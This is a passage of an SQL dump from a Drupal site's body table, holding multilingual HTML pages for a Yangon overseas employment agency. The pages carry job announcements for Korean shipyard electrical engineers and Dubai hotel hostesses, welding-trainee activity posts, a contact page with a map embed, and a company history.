style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>2) Related degree and experience</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Degree: Electronic Engineering, Electrical Power Engineering</div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html'),
('announcement', 0, 10, 358, 'ja', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><p>韓国の造船所で電気エンジニアのポジションで働きたい経験豊富なエンジニアを緊急で募集しています。<br>電気エンジニア<br>1)資格&nbsp;<br>大学の学士号またはそれ以上の学位 + その分野での1年の経験<br>&nbsp; &nbsp;コミュニティカレッジの学位 + その分野での5年の経験</p><p>2)関連する学位と経験<br>学位: 電子工学、電力工学</p><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html'),
('announcement', 0, 10, 358, 'ko', 0, '<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><h3 style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">Electrical Engineer</h3><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>1)Qualification</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Bachelor\'s degree or higher + 1 year of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Community college degree + 5 years of experience in the field.</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\"><strong>2) Related degree and experience</strong></div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">-Degree: Electronic Engineering, Electrical Power Engineering</div><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">&nbsp;</div></div><div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\" style=\"-webkit-text-stroke-width:0px;background-color:rgb(255, 255, 255);color:rgb(5, 5, 5);font-family:system-ui, -apple-system, &quot;system-ui&quot;, &quot;.SFNSText-Regular&quot;, sans-serif;font-size:15px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;margin:0.5em 0px 0px;orphans:2;overflow-wrap:break-word;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:pre-wrap;widows:2;word-spacing:0px;\"><div style=\"font-family:inherit;letter-spacing:normal;text-align:start;\" dir=\"auto\">NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</div></div>', '', 'full_html'),
('page', 0, 11, 314, 'en', 0, '<h3>New Comet Trading Agency Co., Ltd.</h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 01 8393300, 01 8393344, 01 8393393, 09 775556677</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p><p>Website: www.newcomettradingagency.com</p>', '', 'full_html'),
('page', 0, 11, 314, 'ja', 0, '<h3><strong>ニュー コメット トレーディング エージェンシー 株式会社</strong></h3><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>Building (A-3-2) 2nd Floor, Room-201, Myanmagonyi Housing, Upper Pansodan Road, Mingalartaungnyunt Tsp., Yangon, Myanmar.&nbsp;<br>Phone: 01 8393300, 01 8393344, 01 8393393, 09 775556677</p><p>Viber: +959 5556677&nbsp;<br>Email: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p><p>Website: www.newcomettradingagency.com&nbsp;</p>', '', 'full_html'),
('page', 0, 11, 314, 'ko', 0, '<h4><strong>뉴코멧 트레이딩 에이전시</strong><br>&nbsp;</h4><p><iframe style=\"border:0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d337.62816273944867!2d96.16264709190438!3d16.785299730479633!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x30c1ec9aae850151%3A0xfccaefb6249cd6cf!2zTXlhbm1hciBHb25lIFlpIEhvdXNpbmcsIOGAoeGAkeGAgOGAuuGAleGAlOGAuuGAuOGAhuGAreGAr-GAuOGAkOGAlOGAuuGAuOGAnOGAmeGAuuGAuCwg4YCb4YCU4YC64YCA4YCv4YCU4YC6!5e0!3m2!1smy!2smm!4v1688359404741!5m2!1smy!2smm\" width=\"100%\" height=\"450\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe></p><p>A 3-2동, 2층, 201호, 미얀마 공리 주택(Myanmagonyi &nbsp;Housing)<br>어퍼 파송단길, 민가라떵뉸타운십(Mingalartaungnyunt Township), 양곤, 미얀마<br>&nbsp;</p><p>전화번호: 01 8393300, 01 8393344, 01 8393393, 09 775556677</p><p>바이버: +959 5556677&nbsp;<br>이메일: <a href=\"mailto:newcometagency@gmail.com\">newcometagency@gmail.com</a></p><p>웹사이트: www.newcomettradingagency.com</p>', '', 'full_html'),
('activities', 0, 17, 188, 'en', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-c7188c268749b8540d04ab028f806430fbfbf8ab8585fd295a24837524dfd0b4_9be9030155b78446.jpg\" data-entity-uuid=\"1659c983-83d4-415f-afac-6ad502c777d2\" data-entity-type=\"file\">(3.6.2023)</p><p>The first batch of welding trainees from NEW COMET TRADING AGENCY CO.,LTD from Sinmalai Shipyard was met by the Deputy Minister of the Ministry of Transport and Communications and gave speeches and inspected the training school.</p><p>NEW COMET TRADING AGENCY CO.,LTD&nbsp;</p><p>(095556677, 095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 188, 'ja', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-c7188c268749b8540d04ab028f806430fbfbf8ab8585fd295a24837524dfd0b4_9be9030155b78446.jpg\" data-entity-uuid=\"1659c983-83d4-415f-afac-6ad502c777d2\" data-entity-type=\"file\">ニューコメット商社株式会社のシンマライク造船所からの初めての溶接研修生たちが、運輸通信省の副大臣によって出迎えられ、スピーチを行い、訓練校を視察しました。</p><p>ニュー コメット トレーディング エージェンシー 株式会社</p><p>(095556677, 095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 17, 188, 'ko', 0, '<p><img src=\"/sites/default/files/inline-images/0-02-05-c7188c268749b8540d04ab028f806430fbfbf8ab8585fd295a24837524dfd0b4_9be9030155b78446.jpg\" data-entity-uuid=\"1659c983-83d4-415f-afac-6ad502c777d2\" data-entity-type=\"file\">(၃-၆-၂၀၂၃)</p><p>ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍&nbsp;<br>အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်&nbsp;</p><p>NEW COMET TRADING AGENCY CO.,LTD&nbsp;</p><p>(095556677, 095015742 ,09775556677,01-8393300,01-8393344)</p><p>&nbsp;</p>', '', 'full_html'),
('announcement', 0, 18, 357, 'en', 0, '<p>Food &amp; Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.</p><p>1-Must be an experienced lady who have at least 2 years work experience in F &amp; B industry</p><p>2-Living expenses, meals and transportation fees are provided.</p><p>3-Must be under 30, healthy and have good communication skill.</p><p>4-Must be graduated from university.</p><p>5-Must speak English well.</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 357, 'ja', 0, '<p>ドバイまたはアブダビの5つ星ホテルで働くフード＆ビバレッジホステスを緊急で求めています。<br>1-飲食業界で少なくとも2年の勤務経験がある経験豊富な女性である必要があります</p><p>2.生活費、食費、交通費を支給します。</p><p>3.30歳以下で健康でコミュニケーション能力のある方。</p><p>4.大学を卒業している必要があります。</p><p>5.英語を上手に話さなければなりません。</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('announcement', 0, 18, 357, 'ko', 0, '<p>Food &amp; Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.</p><p>1-Must be an experienced lady who have at least 2 years work experience in F &amp; B industry</p><p>2-Living expenses, meals and transportation fees are provided.</p><p>3-Must be under 30, healthy and have good communication skill.</p><p>4-Must be graduated from university.</p><p>5-Must speak English well.</p><h4>Contact Us</h4><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,09971286882, 09752510732,<br>01-8393300,01-8393344)</p>', '', 'full_html'),
('activities', 0, 19, 186, 'en', 0, '<p><img src=\"/sites/default/files/inline-images/viber_image_2023-06-27_12-28-58-368.jpg\" data-entity-uuid=\"c67a7f8d-4d56-4cbd-8e31-13d5992592fc\" data-entity-type=\"file\">Over 60 people from 1st Batch came to register for KOSHIPA Skill Test to go to Korea with welding technician position E 7-3 Visa</p><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('activities', 0, 19, 186, 'ja', 0, '<p><img src=\"/sites/default/files/inline-images/viber_image_2023-06-27_12-28-58-368.jpg\" data-entity-uuid=\"c67a7f8d-4d56-4cbd-8e31-13d5992592fc\" data-entity-type=\"file\"></p><p>第1バッチから60人以上の方が、溶接技術者のE 7-3ビザポジションで韓国に行くためのKOSHIPAスキルテストの受験登録にやってきました。</p><p>ニュー コメット トレーディング エージェンシー 株式会社 (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('activities', 0, 19, 186, 'ko', 0, '<p><img src=\"/sites/default/files/inline-images/viber_image_2023-06-27_12-28-58-368.jpg\" data-entity-uuid=\"c67a7f8d-4d56-4cbd-8e31-13d5992592fc\" data-entity-type=\"file\">Over 60 people from 1st Batch came to register for KOSHIPA Skill Test to go to Korea with welding technician position E 7-3 Visa</p><p>NEW COMET TRADING AGENCY CO.,LTD (09775556677, 09950947491 , 095015742 ,01-8393300,01-8393344)</p>', '', 'full_html'),
('activities', 0, 20, 185, 'en', 0, '<p><img src=\"/sites/default/files/inline-images/viber_image_2023-06-27_12-31-19-935.jpg\" data-entity-uuid=\"33b923ac-f2d3-4758-958d-c78ef6f25db1\" data-entity-type=\"file\">Memorial Photo of 2nd Batch Welding Students (19-6-2023)</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 20, 185, 'ja', 0, '<p><img src=\"/sites/default/files/inline-images/viber_image_2023-06-27_12-31-19-935.jpg\" data-entity-uuid=\"33b923ac-f2d3-4758-958d-c78ef6f25db1\" data-entity-type=\"file\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong>第</strong></span><span style=\"line-height:107%;mso-bidi-font-size:10.5pt;\"><strong>2</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong>回生　研修生達と記念</strong></span><span style=\"line-height:107%;mso-bidi-font-size:10.5pt;\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong>（</strong></span><span style=\"line-height:107%;mso-bidi-font-size:10.5pt;\"><strong>2023</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong>年</strong></span><span style=\"line-height:107%;mso-bidi-font-size:10.5pt;\"><strong>6</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong>月</strong></span><span style=\"line-height:107%;mso-bidi-font-size:10.5pt;\"><strong>20</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-bidi-font-size:10.5pt;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong>日）</strong></span><o:p></o:p></p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 20, 185, 'ko', 0, '<p><img src=\"/sites/default/files/inline-images/viber_image_2023-06-27_12-31-19-935.jpg\" data-entity-uuid=\"33b923ac-f2d3-4758-958d-c78ef6f25db1\" data-entity-type=\"file\">Memorial Photo of 2nd Batch Welding Students (19-6-2023)</p><p>&nbsp;</p>', '', 'full_html'),
('page', 0, 23, 306, 'en', 0, '<p>We, “NEW COMET TRADING” company, was established in 2004 and started operating with company registration number (295/2004-2005).<br>NEW COMET TRADING AGENCY Co.,Ltd (New Comet Overseas Employment Agency) license was obtained in 2023 and since then, the company has started to carry out service activities.<br>“NEW COMET TRADING” is part of the “NEW COMET TRADING GROUP”. Moreover, the largest entity within it, ZEYA NEW COMET Auto Sale &amp; Services Co.,Ltd, have applied for vehicle import permits from the Ministry of Economy and Commerce, and have been working for more than 25 years in the business of buying, importing and selling various types of business trucks, tourism and transportation buses and machinery directly from Japan. We have been diligent in paying our taxes and have grown to employ 100 employees.<br>In addition, brother companies such as NEW COMET Construction Co.,Ltd, NEW ZAYYA SHWE PYI Construction Co.,Ltd, AUNG NAY WUN Construction Co.,Ltd and other companies have also successfully won tenders from government ministries and have provided employment opportunities to more than 200 employees.<br>Our company \"NEW COMET TRADING AGENCY “company is currently providing welding training courses to become qualified skilled workers at the Sinmalike Shipyard for ethnic brothers from all over Myanmar who want to work in Korea\'s shipyards and connect them with job opportunities.<br>In addition, we are connecting job opportunities for young people who want to work in countries such as Dubai, Malaysia, Singapore, Thailand, Japan, Korea, and etc.<br>We at NEW COMET TRADING AGENCY Co., Ltd., are responsible for assisting to-be-employees from the young generation of Myanmar in learning about Japan\'s developed advanced technologies and cultures, while making sure they are able to express their personal abilities and traits.<br>In order to for our to-be-employees to pass the qualification tests (JLPT, JFT, NAT-TEST, TOP-J) required to go to Japan with a Work Visa and Training Visa, we are opening language training schools and providing teaching support.<br>We, \"NEW COMET TRADING AGENCY\" company, is constantly striving to provide services that produce talented skilled workers from Myanmar and send them to foreign countries.</p><img src=\"/sites/default/files/inline-images/1-NC.jpg\" data-align=\"center\" data-entity-uuid=\"1427dc29-05a8-43fe-8ca3-965d16ed0865\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-1.jpg\" data-align=\"center\" data-entity-uuid=\"b8d07038-b5d4-49f5-ac18-2a68edcf66f2\" data-entity-type=\"file\"><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/NC-2.jpg\" data-align=\"center\" data-entity-uuid=\"80e04f60-8b31-432d-8034-205f1107df2f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-3_3.jpg\" data-align=\"center\" data-entity-uuid=\"c61b6e94-5844-4d70-b108-0025c10e8c01\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-4_2.jpg\" data-align=\"center\" data-entity-uuid=\"22d0dbf7-a2af-4fe3-8bc8-24a817d8c9fb\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-5_2.jpg\" data-align=\"center\" data-entity-uuid=\"34eb5e97-7887-40fb-a532-ea7158607de6\" data-entity-type=\"file\"><img data-entity-uuid=\"fdb82619-ca1a-4347-ad15-71c283cda59b\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-6_2.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-7_2.jpg\" data-align=\"center\" data-entity-uuid=\"8e2efe47-a4a1-4b3b-9d28-11019136c724\" data-entity-type=\"file\"><img data-entity-uuid=\"43d414b0-75e3-40e5-b535-eb8bc91ae947\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-8_2.jpg\" data-align=\"center\"><img data-entity-uuid=\"a74c9c3b-1631-4c0f-8750-7543e24d67be\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-9_2.jpg\" data-align=\"center\"><img data-entity-uuid=\"0611b3a9-c229-444d-906e-d6401ae82458\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-10_5.jpg\" data-align=\"center\"><img data-entity-uuid=\"2de69b23-8c4f-473c-b679-a074892f3b85\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-11_5.jpg\" data-align=\"center\"><img data-entity-uuid=\"2a605b5f-2bff-4071-addf-6b65cfd37a53\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-12_5.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-13.jpg\" data-align=\"center\" data-entity-uuid=\"aeca03e1-f9a3-4e0e-b7b6-1660dbd60c8a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-14.jpg\" data-align=\"center\" data-entity-uuid=\"99606141-7880-4242-9f8a-39d779b7c3f4\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-15.jpg\" data-entity-uuid=\"ebdb65e0-ba0b-4289-b787-403a08a7137c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-16.jpg\" data-entity-uuid=\"89d8fc77-4e52-42ff-81bd-8cbddd3dfa5f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-17.jpg\" data-align=\"center\" data-entity-uuid=\"9f81c640-bf3c-45f2-85d1-72c351c50da7\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-18.jpg\" data-align=\"center\" data-entity-uuid=\"eaba01fe-9f4f-4c78-b4f7-f966c16106b2\" data-entity-type=\"file\"><img data-entity-uuid=\"08a12c29-83b6-46ca-b835-84f7f6270b3d\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-19_2.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-20.jpg\" data-align=\"center\" data-entity-uuid=\"310286d4-6f8d-425b-b758-ba0c7a46a78c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-21.jpg\" data-align=\"center\" data-entity-uuid=\"2a48e008-54b7-4ada-9bec-ec877fb83f54\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-22.jpg\" data-align=\"center\" data-entity-uuid=\"010a0743-1136-4045-92de-ffa7bb03b84f\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-23.jpg\" data-align=\"center\" data-entity-uuid=\"61230765-b357-46fe-a38d-1699896c48d6\" data-entity-type=\"file\"><img data-entity-uuid=\"1ffe4d12-0ef2-42f1-a14c-683cff75bd4c\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/NC-24_2.jpg\" data-align=\"center\"><img src=\"/sites/default/files/inline-images/NC-25.jpg\" data-entity-uuid=\"e21d162f-6f5a-4935-bbcb-5001a8cba017\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-26.jpg\" data-align=\"center\" data-entity-uuid=\"00ae4e32-0e8a-4187-9efe-abfe0a26501b\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-27.jpg\" data-align=\"center\" data-entity-uuid=\"2989d3e0-2393-49ad-a73e-684f01edf0fa\" data-entity-type=\"file\" alt=\"\"><img src=\"/sites/default/files/inline-images/NC-28.jpg\" data-align=\"center\" data-entity-uuid=\"56339d67-286d-4418-9789-87b2f0456386\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-29.jpg\" data-align=\"center\" data-entity-uuid=\"b26a003e-c37f-4b76-bb1a-3b646ab2f771\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-40_2.jpg\" data-align=\"center\" data-entity-uuid=\"e50b34c5-96f9-44a3-bc19-61e501f16184\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/NC-41.jpg\" data-align=\"center\" data-entity-uuid=\"d65558d3-211e-4a10-8124-f4f01a42f4b5\" data-entity-type=\"file\">', '', 'full_html');
INSERT INTO `node__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
